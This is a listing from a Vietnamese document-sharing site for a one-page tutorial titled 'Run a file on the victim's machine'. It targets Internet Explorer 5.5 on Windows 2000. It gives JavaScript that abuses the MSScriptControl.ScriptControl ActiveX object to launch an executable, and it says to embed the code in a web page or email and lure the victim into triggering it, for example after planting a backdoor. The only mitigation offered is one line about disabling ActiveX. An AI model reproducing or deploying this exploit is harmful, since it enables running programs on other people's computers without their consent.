Chạy file trên máy của victim

Chia sẻ: Vietnam 9h | Ngày: | Loại File: DOC | Số trang:1

Thêm vào BST

Báo xấu

70
lượt xem 5
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

Test trên IE 5.5 Windows 2000 · Bug này là bug của ActiveX object "MSScriptControl.ScriptControl" bạn có thể xem thêm nhiều điều ở trong : C:\Documents and Settings\USERNAME\Local Settings\Temporary Internet Files\Content.IE5\index.dat.

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Chạy file trên máy của victim

Chạy file trên máy của victim : trang này đã được đọc lần Giới thiệu : Bạn đã cài được backdoor vào victim hay muốn chạy 1 file nào đó trên máy của victim ? • Trong khi visit website hay check mail thì bạn có thể chạy 1 file mà bạn biết , ví dụ : • notepad.exe ngay trên Browser Test trên IE 5.5 Windows 2000 • Bug này là bug của ActiveX object "MSScriptControl.ScriptControl" bạn có thể xem thêm • nhiều điều ở trong : C:\Documents and Settings\USERNAME\Local Settings\Temporary Internet Files\Content.IE5\index.dat. Tiến hành Chắc chắn rằng victim dùng IE 5.5 Windows 2000 !!:) • Tạo một file .html có mã như sau : • Noi dung website v=new ActiveXObject("MSScriptControl.ScriptControl.1"); v.Language="VBScript"; x=v.eval('GetObject("c:/ten_file_can_chay.exe(hay gi do')","htmlfile")'); setTimeout("alert(x.body.outerHTML);",2000); Nhúng mã nguồn trên vào Website hay email, sau đó nhử cho victim kích hoạt • Ðể khắc phục bạn cần bỏ ActiveX đí hay tốt nhất là không dùng IE nữa (ý kiến hay) •